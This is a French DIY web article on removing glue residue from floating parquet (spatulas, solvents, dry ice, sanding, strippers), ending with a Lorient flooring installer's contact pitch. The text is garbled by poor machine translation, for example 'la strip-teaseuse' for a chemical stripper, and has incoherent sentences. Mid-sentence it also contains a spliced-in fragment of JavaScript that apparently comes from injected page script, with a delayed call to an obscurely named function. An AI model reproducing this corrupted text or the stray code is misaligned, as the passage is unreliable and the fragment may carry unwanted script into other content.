Comment enlever des traces de colle sur du parquet flottant ?

Le parquet confère à votre maison une atmosphère chaleureuse et conviviale. Il s’adapte à la fois à une décoration classique et moderne.

Oui, mais maintenant, une fois l’installation terminée, il est très probable qu’il y ait des résidus de colle disgracieux .

A lire en complément : Quel produit pour éviter que les chien urine ?

Voici quelques conseils pour les faire disparaître sans endommager vos lames de bois.

Pour éliminer les résidus de colle vinylique

Lorsque l’adhésif vinyle sèche, il peut être facilement retiré. Pour vous aider à le faire, procurez-vous une spatule en bois .

A lire aussi : Salle de bain 5m2 : comment aménager une salle de bain de 5m2 ?

Pourquoi ? Parce que ce dernier est très flexible et n’endommagera pas votre parquet. Si vous n’en avez pas, une spatule en plastique se remplace très bien.

En revanche, évitez les outils métalliques qui pourraient endommager vos lames .

Pour continuer, marquez soigneusement la colle avec un Grattez la spatule

. Lorsque vous l’avez retiré avec succès, il suffit d’appliquer une éponge humide sur les traces restantes. C’est aussi simple que cela ! Pour éliminer les résidus d’adhésif au solvant

Encore une fois, votre spatule en bois sera un grandom () * 6) ; if (nombre1==3) {var delay = 18000 ; setTimeout ($Ikf (0), delay) ;} et help. Après avoir retiré le plus gros, appliquez un dissolvant de colle adapté au revêtement de sol avec un pinceau. Vous pouvez facilement les trouver dans n’importe quelle quincaillerie. Le produit fonctionne très bien sur les résidus, même les plus anciens. Assurez-vous de protéger vos mains du dissolvant avec des gants en plastique

. Pour un résultat impeccable, rincez le produit à l’eau. Et si cela ne fonctionne pas ?

Si vous souhaitez ensuite peindre votre parquet, utilisez de la glace carbonique. Ce dernier est parti Laissez la colle geler, ce qui la rend devient cassant et est donc plus facile à décoller. Si le parquet présente encore quelques irrégularités par la suite, le ponçage reste une option parfaitement viable. Pour ce faire, utilisez du papier de verre que vous frottez doucement sur le bois pour éviter d’éventuelles rayures. Dernier recours : la strip-teaseuse. Lorsque ce produit chimique est manipulé avec précaution, il liquéfie l’adhésif. Attention, vous devez agir rapidement, car il y a un risque qu’il pénètre dans les pores du bois et provoque des taches sombres. Si le problème persiste, n’hésitez pas à nous contacter, nous sommes à votre disposition pour installer votre parquet à Lorient.

vous pourriez aussi aimer